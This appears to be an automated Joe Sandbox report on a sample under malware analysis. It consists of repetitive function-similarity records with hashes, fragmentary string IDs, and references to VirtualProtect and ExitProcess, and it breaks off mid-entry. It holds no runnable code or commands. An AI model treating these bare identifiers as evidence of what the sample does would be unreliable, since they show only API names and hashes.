                                                                                                                        • Instruction ID: 2eaf220d0d019d4476795fcdad0f36ee08c7a98f075cd34990ffe1a67c0fd865
                                                                                                                        • Opcode Fuzzy Hash: cf541e64226296dde0f04c1dae3208fa3a1819e8189e5f36ca0d2be6f11d627c
                                                                                                                        • Instruction Fuzzy Hash: AAC127A2C082649AF7208624DC447EB7A68DF51314F1440FED94DA72C1DABE1FC6CBA7
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: c1b652991f57b4d51d9afdfe0ce1b521bfe89a5e91ad65749f707dbb660ceaf2
                                                                                                                        • Instruction ID: eee95b753abb5236ba68af6bac4d2848ac6c00735159e87780bc59e9a7c006ba
                                                                                                                        • Opcode Fuzzy Hash: c1b652991f57b4d51d9afdfe0ce1b521bfe89a5e91ad65749f707dbb660ceaf2
                                                                                                                        • Instruction Fuzzy Hash: D9C134A2D042649AF7208624DC44BEB7A69DF51314F0440FED98D672C1DABE1FC68B67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 67509ac4e62c815589baa350d5fae777ee73be06b571ee8fc4c68fd4bd71ad68
                                                                                                                        • Instruction ID: b87fff604113521d0e075d409872acac2f19840f2612352ddb19065799ca5343
                                                                                                                        • Opcode Fuzzy Hash: 67509ac4e62c815589baa350d5fae777ee73be06b571ee8fc4c68fd4bd71ad68
                                                                                                                        • Instruction Fuzzy Hash: 9EC137A2C082649AF7208624DC447EB7A69DF51314F1440FED94DA72C1DABE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: a97721c17aed311aaa0913c21342f9e64ea72508fae81aa1c56ff57a7b0cf0b8
                                                                                                                        • Instruction ID: c319c942094677a70afdbac739dc446af6ba709f5ac1e1e70e693c49bdc09623
                                                                                                                        • Opcode Fuzzy Hash: a97721c17aed311aaa0913c21342f9e64ea72508fae81aa1c56ff57a7b0cf0b8
                                                                                                                        • Instruction Fuzzy Hash: CEC124A2D082649AF7208624DC447EB7A69DF51310F1440FED98D672C1DABE0FC6CBA7
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 5d83786fcbbd1a376f8d13976f562422fa6cf704a8b3cf443a60f46201b176c3
                                                                                                                        • Instruction ID: 9e595a24c9be7f7410a59fb938de830ddc10ba8880a9535f11e1221573845212
                                                                                                                        • Opcode Fuzzy Hash: 5d83786fcbbd1a376f8d13976f562422fa6cf704a8b3cf443a60f46201b176c3
                                                                                                                        • Instruction Fuzzy Hash: E5C136A2C082649AF7208624DC447EB7A68DF51310F1440FED98DA72C1DABE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 4467e9f4c2d4e4537828d09e37f5eaea477485ba2b457bd53e0c0fd48335732b
                                                                                                                        • Instruction ID: e61220c44efc44d8f35c04059808cad78e1aea9d5a9cba44ff91179e6e520261
                                                                                                                        • Opcode Fuzzy Hash: 4467e9f4c2d4e4537828d09e37f5eaea477485ba2b457bd53e0c0fd48335732b
                                                                                                                        • Instruction Fuzzy Hash: 2DC134A2D082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE1FC5CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 0-3687113455
                                                                                                                        • Opcode ID: ebb81f9b8675731f2a4ebe9f8b60e68014bc6d86446735dfd1b1c91826dd882e
                                                                                                                        • Instruction ID: 3953e652c82acacf2376db354ccff2cc4dd553918c662f570162e4efd4c28474
                                                                                                                        • Opcode Fuzzy Hash: ebb81f9b8675731f2a4ebe9f8b60e68014bc6d86446735dfd1b1c91826dd882e
                                                                                                                        • Instruction Fuzzy Hash: F3B137A2C082A49AF7218624DC447EB7A69DF51314F1840FED98D672C1DABE0FC5CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 0-3687113455
                                                                                                                        • Opcode ID: 2a159c55b41b2f413e0f49f0480d06678424549b87c771006e9ff6e0b7b40e23
                                                                                                                        • Instruction ID: 28b33057099f83837c3dca2da08c3296219d264ada31e600d4e2ea29d100dc91
                                                                                                                        • Opcode Fuzzy Hash: 2a159c55b41b2f413e0f49f0480d06678424549b87c771006e9ff6e0b7b40e23
                                                                                                                        • Instruction Fuzzy Hash: 8FB147A2C082649AF7208224EC447EB7A69DF51314F1840FED98D672C1DABE0FC5CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 0-3687113455
                                                                                                                        • Opcode ID: 8c499a1e6beeebcdf27e33fcb0cab51cc49d3740f675232e690da04a5c30b26b
                                                                                                                        • Instruction ID: a4343995d422e425631eb120bb7ec65cd211a5358cfa88a02a89882b7cf93bfd
                                                                                                                        • Opcode Fuzzy Hash: 8c499a1e6beeebcdf27e33fcb0cab51cc49d3740f675232e690da04a5c30b26b
                                                                                                                        • Instruction Fuzzy Hash: EAA148A2C082A49AF7218224EC447E77A68DF51314F1440FED98D672C1DABE0FD5CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 0-3687113455
                                                                                                                        • Opcode ID: 6943e5728bfdb4b1d2f9c41d8336dd066317e98731f9c5b6d46add078f964e5d
                                                                                                                        • Instruction ID: 689ca2796c9c1840187c645857b675f83b57d09b1d29273d245ddddd8b1f55d8
                                                                                                                        • Opcode Fuzzy Hash: 6943e5728bfdb4b1d2f9c41d8336dd066317e98731f9c5b6d46add078f964e5d
                                                                                                                        • Instruction Fuzzy Hash: 15A136A2C082A49AF7218224DC447EB7A69DF51314F0440FED98D672C1DABE1FD5CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 0-3687113455
                                                                                                                        • Opcode ID: 4a66ad29619ac676a93144ee969966daf6e513a139b26c504096f27bf0c2153e
                                                                                                                        • Instruction ID: 5735f5ab838bd17a2a2fb1866061a4ed934e0264e27ca9799a63e166222e5c24
                                                                                                                        • Opcode Fuzzy Hash: 4a66ad29619ac676a93144ee969966daf6e513a139b26c504096f27bf0c2153e
                                                                                                                        • Instruction Fuzzy Hash: 76A136A2C082A49AF7218224DC447EB7A68DF51314F1840FED98D672C1DABE0FD5CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 0-3495335710
                                                                                                                        • Opcode ID: 356cb6b6af8fe70fdd6c351638d77fc7f100cfa8c1bb793a0c92c0e9c193bf2a
                                                                                                                        • Instruction ID: 34fddcb1e9d5058dcc7c149b19fa34fb0f35074b7671cf4c9403869f234c370d
                                                                                                                        • Opcode Fuzzy Hash: 356cb6b6af8fe70fdd6c351638d77fc7f100cfa8c1bb793a0c92c0e9c193bf2a
                                                                                                                        • Instruction Fuzzy Hash: 10A147A2C082A49AF7208224DC447E77A69DF51314F0440FED98D672C1DABE0FD5CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: L$L$Q$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                        • API String ID: 0-362670629
                                                                                                                        • Opcode ID: ee3de20643e8a4cb37e7f02d86109b2d841ca61146a646775295e19ff8e22f67
                                                                                                                        • Instruction ID: ebda467260b922b430d7c10c8d5c8c230fff28bf33abcdce350ed1e6cf4495ba
                                                                                                                        • Opcode Fuzzy Hash: ee3de20643e8a4cb37e7f02d86109b2d841ca61146a646775295e19ff8e22f67
                                                                                                                        • Instruction Fuzzy Hash: 969147E2C042649AF7208624EC447E77A28DF50314F1440FED98D672C1DABE0FC68BA7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: L$L$Q$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                        • API String ID: 0-362670629
                                                                                                                        • Opcode ID: c4f028e7766f9711cdf050a13418965ce0e6ba244347ff9df3922f9d2b371101
                                                                                                                        • Instruction ID: b7d4b4e4f70d161fc8e6186cf41b612343db26370f5afff7722bf30da49ce927
                                                                                                                        • Opcode Fuzzy Hash: c4f028e7766f9711cdf050a13418965ce0e6ba244347ff9df3922f9d2b371101
                                                                                                                        • Instruction Fuzzy Hash: A58124A2C042649AF7218624EC447EB7A78DF50314F1440FED94DA72C1DABE0FD68BA7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: L$L$Q$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                        • API String ID: 0-362670629
                                                                                                                        • Opcode ID: 39a48382bbafa562567b07526fbcc5a484c1dd0a053792aae783f587aa057ea8
                                                                                                                        • Instruction ID: 01f98888b8178c1e4de167165ef80fa34ba42e1b3813b0e96653d14865058fd7
                                                                                                                        • Opcode Fuzzy Hash: 39a48382bbafa562567b07526fbcc5a484c1dd0a053792aae783f587aa057ea8
                                                                                                                        • Instruction Fuzzy Hash: CD8126A2C042649AF7218624EC447EB7A78DF50314F1440FED94DA72C1DABE0FD68BA7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                        • API String ID: 0-1254073115
                                                                                                                        • Opcode ID: eef1b0159310960a5579aeecca145dc0f6b7b6d5c8a821815ff35db13d52961e
                                                                                                                        • Instruction ID: 6e0dc6df7026693b3059b0e6e8dd19d81659089e6b85c43b871315c3051e56dc
                                                                                                                        • Opcode Fuzzy Hash: eef1b0159310960a5579aeecca145dc0f6b7b6d5c8a821815ff35db13d52961e
                                                                                                                        • Instruction Fuzzy Hash: 1A7117A2D082649AF7118624DC447EB7A39DF90314F1480FED94D676C1DABE0FC68B67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                        • API String ID: 621844428-1254073115
                                                                                                                        • Opcode ID: c15f0309d1f8947013e935a5b2f87d95b4204988901cc44e5628654f1e969098
                                                                                                                        • Instruction ID: 1d5c0d6fc0a0cad58a64867cb9dda15ac2d09c3e53903cdbc0d09b8f6bae42ef
                                                                                                                        • Opcode Fuzzy Hash: c15f0309d1f8947013e935a5b2f87d95b4204988901cc44e5628654f1e969098
                                                                                                                        • Instruction Fuzzy Hash: 3E6103A2D082649AF7218624DC447EB7A79DF50314F1440FED94DA72C1DABE0FC68B67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                        • API String ID: 621844428-1254073115
                                                                                                                        • Opcode ID: e6066a3d4abbb1635fe5fae22006a3be89af81795a40b67f7128f1f6f5e0f16a
                                                                                                                        • Instruction ID: df686831fa21e1befb851f5356a7e8b2e602615655cf4bead9fa41a67d850fbd
                                                                                                                        • Opcode Fuzzy Hash: e6066a3d4abbb1635fe5fae22006a3be89af81795a40b67f7128f1f6f5e0f16a
                                                                                                                        • Instruction Fuzzy Hash: BF6115A2D082649AF7218624DC447EB6A79DF50314F1440FED98D672C1DABE0FC6CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                        • API String ID: 621844428-1254073115
                                                                                                                        • Opcode ID: 9015c192cc738454935b7f6c103b2843e83d8686b0f842729940c2491ad02f88
                                                                                                                        • Instruction ID: ed1d0fc44fa6dae5abd16b68b09f099e354a328653aca3ac19db7560fdff8759
                                                                                                                        • Opcode Fuzzy Hash: 9015c192cc738454935b7f6c103b2843e83d8686b0f842729940c2491ad02f88
                                                                                                                        • Instruction Fuzzy Hash: 886125A2D082649AF7218624DC447EB7A79DF90314F1440FED94DA72C1DABE0FC68B67
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: :2JA
                                                                                                                        • API String ID: 621844428-2456821934
                                                                                                                        • Opcode ID: f3c878ab16705ea9f82f92b0ddee40d50b4276ea5531a59f84641f81612c9b0d
                                                                                                                        • Instruction ID: bf51dbdda2850569a1e7a74a7fe0387b01734766c60d2e2ccaf44523e746ffd9
                                                                                                                        • Opcode Fuzzy Hash: f3c878ab16705ea9f82f92b0ddee40d50b4276ea5531a59f84641f81612c9b0d
                                                                                                                        • Instruction Fuzzy Hash: 0F8157B2C042549FF714CA64DC84AEB7B78FB80314F2581BBD94DA7282D67D5EC2CA52
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: Windows 95
                                                                                                                        • API String ID: 621844428-1505401244
                                                                                                                        • Opcode ID: 50a9c8f689e76349132a38162203a535cafa4444d6dfc1baadaec9f358013911
                                                                                                                        • Instruction ID: 54e852cc576455bbeb4d16f42f89e961844592acf3bb7ffbb43d7618b21edb90
                                                                                                                        • Opcode Fuzzy Hash: 50a9c8f689e76349132a38162203a535cafa4444d6dfc1baadaec9f358013911
                                                                                                                        • Instruction Fuzzy Hash: 2171F6F2D041149BF7148B14DD45BFBB67AEF90310F2481BFE84966784EA7D5EC28A22
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: 466a86207167e43278c49b8836738d82a8810691bc9301ea5ff31ad0459951fb
                                                                                                                        • Instruction ID: 71c2d81bb5cba6040eb8f671395b0986b91675529fa7c06a0e2a8f7b7a932dce
                                                                                                                        • Opcode Fuzzy Hash: 466a86207167e43278c49b8836738d82a8810691bc9301ea5ff31ad0459951fb
                                                                                                                        • Instruction Fuzzy Hash: 837113B2E085649BF7208A68DC94BEF7B79FBC0315F1441BBD90E622C1D73C1E868A55
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                        • API String ID: 621844428-1254073115
                                                                                                                        • Opcode ID: e73cb6a01dc10b5a82334384cf326f9750e6c6c60bf6ad37b4e053010980c236
                                                                                                                        • Instruction ID: 002ba12ece9c9b47baed33734d15a8fee468393e4ca8b9fa760db5392b251f20
                                                                                                                        • Opcode Fuzzy Hash: e73cb6a01dc10b5a82334384cf326f9750e6c6c60bf6ad37b4e053010980c236
                                                                                                                        • Instruction Fuzzy Hash: 7B6125A2D086649AF7208624EC447E76A39DF50310F1440FED94DA72C1DABE0FD68BA7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                        • API String ID: 621844428-1254073115
                                                                                                                        • Opcode ID: 606e63f531aa979e66e4b79544cdfa3c1b55464958fa5903861b0c72f1933b73
                                                                                                                        • Instruction ID: 70b32fb56e953e831ee1c6a9b067e3275182b7350fbba4091f78134af53b1258
                                                                                                                        • Opcode Fuzzy Hash: 606e63f531aa979e66e4b79544cdfa3c1b55464958fa5903861b0c72f1933b73
                                                                                                                        • Instruction Fuzzy Hash: 3F6114A2D082649AF7218624DC447EB7A79DF50314F1440FED94DA72C1DABE0FC68B67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                        • API String ID: 621844428-1254073115
                                                                                                                        • Opcode ID: c4be063b547142f42d0c13c4066b1a4a8f240d041d58b5e6cc6055d236f2c1ef
                                                                                                                        • Instruction ID: a72bb31166aa381497903e97bc9c24f5bcc4b6703112e4e099c378d301880388
                                                                                                                        • Opcode Fuzzy Hash: c4be063b547142f42d0c13c4066b1a4a8f240d041d58b5e6cc6055d236f2c1ef
                                                                                                                        • Instruction Fuzzy Hash: D06103A1D082649AF7218624DC447EB7A39DF50310F1440FED94DA72C1DABE0FC68B67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                        • API String ID: 621844428-1254073115
                                                                                                                        • Opcode ID: b61b37e6c1c3ce702835899ca951e94c148d5ddb985cd3c2e1f30e08d6961b1c
                                                                                                                        • Instruction ID: 908e1b507a0170028a9da51af9384c436a8bbe588f6ececa98b85f8372e705ec
                                                                                                                        • Opcode Fuzzy Hash: b61b37e6c1c3ce702835899ca951e94c148d5ddb985cd3c2e1f30e08d6961b1c
                                                                                                                        • Instruction Fuzzy Hash: CB5114A1D082648AF7218624DC447EB7A39DF91310F1440FED98DA76C1DABE0FD68B67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: GGN9$Windows 95
                                                                                                                        • API String ID: 621844428-3770922624
                                                                                                                        • Opcode ID: 35d5a47730b24da60319818b9ddf853cfb2f8b3c7cb5040908ea032ef5fb614c
                                                                                                                        • Instruction ID: 1e537a0af2ca5927453d0216449e8262732467145e920a59f4c5c1172cade705
                                                                                                                        • Opcode Fuzzy Hash: 35d5a47730b24da60319818b9ddf853cfb2f8b3c7cb5040908ea032ef5fb614c
                                                                                                                        • Instruction Fuzzy Hash: 0F31F5F2D041249EF3504654ED84BFB362CDB80320F24817FD84EA66C1EA7D5EC689A7
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: 2H?$Windows 95
                                                                                                                        • API String ID: 621844428-1577999745
                                                                                                                        • Opcode ID: 557803fb8bd20435206b454844b31fe281f146a0072662f4d932d07f3a7b7531
